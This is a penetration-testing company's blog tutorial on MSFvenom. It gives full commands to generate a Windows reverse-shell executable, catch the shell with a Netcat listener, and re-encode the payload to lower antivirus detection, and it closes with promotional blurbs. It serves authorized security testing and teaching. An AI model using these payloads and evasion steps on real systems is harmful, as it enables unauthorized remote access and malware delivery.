The Exploit

Notes from the Front Lines of Penetration Testing

Cool Tools Series: How MSFvenom Powers Penetration Testing

Cool Tools Series: How MSFvenom Powers Penetration Testing

Written by

In this post in the Cool Tools series, I’m going to share some tips on getting started with MSFvenom and how it can help you obtain a reverse shell on your penetration tests. If you missed Andrew Trexler’s recent Nuclei blog, be sure to check that out when you finish here!

MSFvenom is a great tool for generating shellcode quickly, with both encryption and/or encoding options available to help prevent AV detection.

The Basics

MSFvenom is part of the Metasploit framework and comes installed with Kali Linux but can also be installed using the following command:

sudo apt install Metasploit-framework

Payloads

The tool has a variety of payloads for different purposes, for specific Operating Systems (including Windows and Linux), and for a large list of web application architectures. A list of all payloads can be obtained from the tool with this command:

msfvenom -l payloads

A full list of options can be obtained from the tool using:

msfvenom –help

Running a Payload

For this example, we will assume that we are running our payload on a computer on a shared internal network. To gain a reverse shell on a target system, we will first need to discover our internal IP address and setup a listener port.

First we will generate a reverse shell payload for a Windows machine as an .exe file, without any additional options:

msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=<Your listening port> -f exe > rev-shell.exe
Generating a reverse shell payload with MSFvenom

Next we place the reverse shell file, now called rev-shell.exe, on the host we are attacking.

After that, we open up a listener port using Netcat with the following command:

nc -lp 9897
Netcat

We see that netcat is actively listening on TCP/9897.

If we execute the payload on the attacking host, we should get a shell on Netcat:

Executing the payload and getting a shell

Bypassing Antivirus

This version of the payload generated by MSFvenom  will quickly be picked up by most AV solutions. When running the generated payload through VirusTotal we see 64/75 detection engines pick up the reverse shell payload as a virus:

VirusTotal results are 64

Let’s regenerate the payload with encoding applied in 10 iterations, using the following command:

msfvenom -p windows/x64/custom/reverse_tcp --encoder x64/xor -i 10 LHOST=<your IP Address> LPORT=<preferred port number> -f exe > rev-shell_encoded.exe
MSFvenom with encoding

Sending that file through VirusTotal, we see that 57/75 detection engines pick the payload up at a threat:

VirusTotal results are 64

There are many features within MSFvenom to help obfuscate the payload from antivirus software and to help bypass AV detection while in transit.

In Conclusion

You can explore more information regarding MSFvenom and the entire Metasploit-framework here: https://www.offsec.com/metasploit-unleashed/msfvenom

I hope you’ve enjoyed this look at MSFvenom. We hope you’ll take a look at the next post in the Cool Tools series as well.


Nathan Anderson

Posted on

Categories: , ,

Also by Nathan Anderson

Human Vs AI Pentesting

While AI tools offer speed in detecting known vulnerabilities, they fall short with 20-35% false positives and only 50-65% success on complex threats like business logic flaws, as per mainstream reports from Verizon and OWASP. Human penetration testers at Raxis deliver 85-90% detection rates, precise prioritization, and ethical adaptability, ensuring your organization stays ahead of real-world attacks.

Partner With Raxis

Partnering with Raxis empowers your business with elite penetration testing services, competitive reseller pricing, and recurring revenue opportunities, all backed by a proven track record of excellence and a commitment to staying ahead of evolving cybersecurity threats.

Penetration Testing

Tailored, expert-led penetration testing services that uncovers hidden vulnerabilities using real-world hacker techniques, providing actionable insights to strengthen your defenses and protect against sophisticated cyber threats.

Ready to See Raxis One In Action?

See how we transform traditional pen testing into interactive security intelligence that keeps you informed every step of the way. From real-time attack progression to detailed remediation guidance, Raxis One gives you unprecedented visibility into your security posture as it’s being tested.